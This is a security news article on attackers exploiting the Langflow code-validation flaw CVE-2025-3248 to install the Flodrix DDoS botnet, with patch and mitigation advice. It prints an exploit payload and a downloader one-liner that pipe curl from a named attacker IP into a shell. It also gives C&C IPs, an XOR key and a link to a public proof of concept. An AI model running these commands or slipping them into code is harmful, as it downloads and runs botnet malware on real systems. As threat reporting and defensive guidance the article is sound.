Hackers Exploit Langflow RCE Vulnerability to Deploy Flodrix Botnet

A critical remote code execution (RCE) vulnerability in Langflow (CVE-2025-3248) is being actively exploited to deploy the Flodrix botnet, enabling full system compromise and distributed denial-of-service (DDoS) attacks.

The flaw, rated 9.8 on the CVSS scale, affects Langflow versions <1.3.0 and allows unauthenticated attackers to execute arbitrary code via malicious API requests.

Trend Micro reports over 500 exposed instances globally, with threat actors leveraging Shodan/FOFA scans and open-source exploit code to infiltrate AI development environments.

Code Injection via AST Compilation

The vulnerability resides in Langflow’s /api/v1/validate/code endpoint, which processes user-submitted Python code without authentication.

Attackers embed malicious payloads in function decorators or default arguments, exploiting Python’s ast.parse() and compile() functions to execute code during AST validation.

Example exploit payload:

```python
@exec("import os; os.system('curl http://80.66.75.121/docker | sh')")
def malicious_function():
    pass
```

This code triggers a downloader script that fetches Flodrix binaries.

Langflow’s lack of input sanitization or sandboxing allows such payloads to execute with server privileges, enabling reconnaissance commands like whoami, printenv, and network interface enumeration.
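Why a bare function definition is enough to run code, shown as an added example (not Langflow's code and not from the original article): `definition_time_effects` reproduces a parse/compile pattern, assumed here to end in `exec` of the compiled definition, on a constructed sample that uses a harmless `record` marker, while `static_findings` is a hypothetical parse-only check that flags calls in decorators and default arguments without running anything. All names and sample inputs are assumptions; `ast.unparse` needs Python 3.9 or later.

```python
import ast

# Constructed sample submissions (not from the article). RISKY uses a harmless
# marker call in the two positions where the article says payloads are embedded.
BENIGN = "def add(a, b=2):\n    return a + b\n"
RISKY = "@record('decorator ran')\ndef f(x=record('default ran')):\n    pass\n"


def definition_time_effects(source):
    """Unsafe pattern, for constructed samples only: compile and exec each def.

    Returns the markers recorded while the 'def' statement itself executed.
    The defined function is never called.
    """
    seen = []

    def record(msg):
        seen.append(msg)
        return lambda fn: fn  # works as a decorator and as a default value

    for node in ast.parse(source).body:
        if isinstance(node, ast.FunctionDef):
            module = ast.Module(body=[node], type_ignores=[])
            exec(compile(module, "<submitted>", "exec"), {"record": record})
    return seen


def static_findings(source):
    """Parse-only check: never compiles or executes the submission.

    Returns (function, position, expression) for each decorator or default
    argument that contains a call.
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        exprs = [("decorator", d) for d in node.decorator_list]
        exprs += [("default", d) for d in node.args.defaults]
        exprs += [("default", d) for d in node.args.kw_defaults if d is not None]
        for kind, expr in exprs:
            if any(isinstance(n, ast.Call) for n in ast.walk(expr)):
                findings.append((node.name, kind, ast.unparse(expr)))
    return findings
```

Flagging calls this way is a triage heuristic for submitted code, not a sandbox.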

From Initial Access to Botnet Deployment

Exploitation follows a structured pattern:

  1. Reconnaissance: Threat actors scan for exposed Langflow instances using tools like Shodan.
  2. Exploitation: A GitHub-hosted PoC (https://github.com/verylazytech/CVE-2025-3248) sends crafted POST requests to execute shell commands.
  3. Payload Delivery: A bash script (docker) downloads architecture-specific Flodrix binaries:

     ```bash
     curl -s http://80.66.75.121:25565/docker | sh
     ```

  4. Persistence: Flodrix uses XOR-based decryption (key: qE6MGAbI) to hide C&C IPs, establishes TCP/UDP channels, and terminates competing processes like busybox or watchdog.

The botnet supports six DDoS attack modes, including tcpraw and udpplain, while evading detection through self-deletion and artifact removal.

Mitigation Strategies and Patch Analysis

Langflow 1.3.0 resolves CVE-2025-3248 by implementing JWT/API key authentication via the CurrentActiveUser dependency. The patch:

  • Validates credentials before processing API requests
  • Checks user activity status via is_active flag
  • Blocks unauthenticated access to /api/v1/validate/code

Recommended actions:

  • Upgrade Langflow to ≥1.3.0 immediately
  • Restrict public access to Langflow endpoints
  • Monitor for IOCs like C&C IPs 80.66.75.121 and 45.61.137.226

| Risk Factor | Details |
|---|---|
| CVE Identifier | CVE-2025-3248 |
| CVSS Score | 9.8 (Critical) |
| Affected Versions | Langflow <1.3.0 |
| Impact | RCE, DDoS attacks, sensitive data exfiltration |
| Remediation | Patch to v1.3.0; implement network segmentation |

Security teams should deploy intrusion prevention filters (e.g., Trend Micro’s #45744) and hunt for Flodrix’s UDP notification patterns (KILLDETAIL|PID|PPID|...).

With AI infrastructure becoming a prime target, proactive vulnerability management is critical to prevent large-scale compromises.

AnuPriya
AnuPriya is a cybersecurity reporter at Cyber Press, specializing in cyber attacks, dark web monitoring, data breaches, vulnerabilities, and malware. She delivers in-depth analysis on emerging threats and digital security trends.
